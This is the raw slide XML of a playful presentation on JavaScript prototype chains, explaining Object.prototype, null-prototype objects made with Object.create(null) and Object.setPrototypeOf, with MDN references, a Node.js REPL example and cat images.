              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8494AE4-C295-BD4D-9686-AB4FED02DC64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4804946"/>
            <a:ext cx="6434807" cy="33855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https://developer.mozilla.org/docs/Web/JavaScript/Reference/Global_Objects/Object/getPrototypeOf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="800" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://developer.mozilla.org/docs/Web/JavaScript/Reference/Global_Objects/Object/setPrototypeOf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9" descr="A cartoon cat with a black background&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95243547-3E25-EC30-C031-9908AE0C1D65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="2141200" flipH="1">
            <a:off x="8581005" y="300227"/>
            <a:ext cx="682194" cy="682194"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1755234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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" i="1" dirty="0" err="1"/>
              <a:t>OwO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" i="1" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Almost all objects, including functions, in JavaScript has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.prototype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> as the end of its prototype chain [1]</a:t>
            </a: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 firebird: </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uwu</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a:solidFill>
                  <a:srgbClr val="00979D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>new</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Date</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"2038-01-19T03:14:08Z"</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It might not be the immediate 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false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a:solidFill>
                  <a:srgbClr val="00979D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>new</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Date</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"2038-01-19T03:14:08Z"</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But eventually you will find </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="1" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Blobcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">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a:solidFill>
                  <a:srgbClr val="00979D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="728E00"/>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endParaRPr lang="en-US" altLang="zh-HK" sz="11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https://developer.mozilla.org/docs/Web/JavaScript/Reference/Global_Objects/Object#description</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="A yellow cat with a crying face">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63E87600-94AD-92E9-0E06-56539991DD68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="9696629">
            <a:off x="8172088" y="529658"/>
            <a:ext cx="1219200" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2940047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i="1" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" i="1" dirty="0" err="1"/>
              <a:t>gwwwwwwwwwwwww</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" i="1" dirty="0" err="1"/>
              <a:t>ÚwÚ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" i="1" dirty="0"/>
              <a:t> I AM WEAVING </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" i="1" dirty="0" err="1"/>
              <a:t>nyow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" i="1" dirty="0"/>
              <a:t> *whispers to self*”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>It is possible to create an object without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.prototype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> in its prototype chain [1]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pP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Objects have `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Object.prototype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>` as its prototype by default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.setPrototypeOf</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Set the prototype to `null`</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.create</a:t>
            </a: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Create the object with the prototype already set as `null`</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Object.prototype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>` itself, of course, has `null` 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endParaRPr lang="en-US" altLang="zh-HK" sz="11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https://developer.mozilla.org/docs/Web/JavaScript/Reference/Global_Objects/Object#null-prototype_objects</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DFD8AB5-9EE2-5BF9-F546-D529C9A51035}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8414550" y="520967"/>
            <a:ext cx="972000" cy="972275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3926714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3</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US"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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="39" name="Group 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77F2D804-946C-5F93-B8C3-F126AEA67D29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="329361" y="1772186"/>
            <a:ext cx="7960976" cy="2530556"/>
            <a:chOff x="329361" y="1772186"/>
            <a:chExt cx="7960976" cy="2530556"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="TextBox 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB02DAA8-FD1C-4BDE-ACAD-A208C69DA9B4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7228248" y="2508908"/>
              <a:ext cx="680222"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sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="TextBox 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EE2DADF-1CDD-CED9-DACC-DFE99B3920F8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2331248" y="2950492"/>
              <a:ext cx="1710405"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9" name="TextBox 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A217B4A7-1082-ED7D-82CE-A050553FC29A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2092618" y="3454538"/>
              <a:ext cx="2128560"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Function</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10" name="TextBox 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CCE7E21-07F3-D79B-2760-B521DED8D199}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1421886" y="2077114"/>
              <a:ext cx="2128560" cy="523220"/>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firebird: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 }</a:t>
              </a:r>
              <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="TextBox 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E474CC98-CB28-DB55-DEEB-655011305FFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="531510" y="2914006"/>
              <a:ext cx="1322479"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highlight>
                    <a:srgbClr val="FFFFFF"/>
                  </a:highligh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highlight>
                    <a:srgbClr val="FFFFFF"/>
                  </a:highlight>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>()</a:t>
              </a:r>
              <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="TextBox 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60330AE6-2EEB-C898-3EE9-62AEF943533F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="329361" y="3442671"/>
              <a:ext cx="1552967"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function</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="728E00"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>() </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="434F54"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>{}</a:t>
              </a:r>
              <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="TextBox 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84EF61B1-3BAD-16A4-8D3D-AD9ADF3E619F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4824182" y="3779522"/>
              <a:ext cx="3466155"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.setPrototypeOf</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null</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.create</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="434F54"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="D35400"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>null</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="434F54"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>)</a:t>
              </a:r>
              <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="15" name="Connector: Curved 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32911E44-E6EC-3F7F-82CD-BFEF41298A56}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:stCxn id="10" idx="3"/>
              <a:endCxn id="7" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3550446" y="2338724"/>
              <a:ext cx="1002664" cy="4379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46896CF9-FEC4-B9D2-342A-A1737E52D00A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:stCxn id="11" idx="3"/>
              <a:endCxn id="8" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1853989" y="3067895"/>
              <a:ext cx="477259" cy="3648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231F4F64-4779-A267-3FB3-1D7E57D7BB78}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:stCxn id="8" idx="3"/>
              <a:endCxn id="7" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="4041653" y="2776653"/>
              <a:ext cx="511457" cy="3277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2E029F52-E363-48E5-1276-38211C0C3302}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:stCxn id="12" idx="3"/>
              <a:endCxn id="9" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1882328" y="3596560"/>
              <a:ext cx="210290" cy="118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5AC25DCE-72E5-3326-2B5E-1ADA78659CF1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:stCxn id="9" idx="3"/>
              <a:endCxn id="7" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="4221178" y="2776653"/>
              <a:ext cx="331932" cy="8317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3CE8089-32C1-2239-3534-F565F01965E6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:stCxn id="7" idx="3"/>
              <a:endCxn id="6" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="6484449" y="2662797"/>
              <a:ext cx="743799" cy="11385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40A54CAB-B259-71CA-195C-6185DEB725C2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:stCxn id="13" idx="0"/>
              <a:endCxn id="6" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="5400000" flipH="1" flipV="1">
              <a:off x="6334392" y="2885666"/>
              <a:ext cx="1116725" cy="670988"/>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BEE89C6-A7C5-5DC9-4329-E249612930D9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4553110" y="1772186"/>
              <a:ext cx="1931339" cy="1158355"/>
              <a:chOff x="4553110" y="1772186"/>
              <a:chExt cx="1931339" cy="1158355"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7" name="TextBox 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC34C8E2-2DC5-6E01-1DB3-53A795D498D9}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4553110" y="2622764"/>
                <a:ext cx="1931339"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37" name="Picture 36">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA94BC5F-A8C4-0E58-9C95-024AC8216A49}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId3"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm flipH="1">
                <a:off x="5032779" y="1772186"/>
                <a:ext cx="972000" cy="972275"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2475010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4</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But why do almost all objects have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in its prototype chain?</a:t>
            </a:r>
          </a:p>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provides useful instance methods [1], such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>toString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> [2]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="434F54"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Welcome to Node.js v22</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8A7B52"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.0.0</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Type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>".help"</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for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> more information.</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toString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// an empty object has no properties, so `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>toString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>` is from `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Object.prototype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D35400"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Function</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toString</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toString</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005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'[object Object]’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D35400"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.create</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D35400"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>toString</a:t>
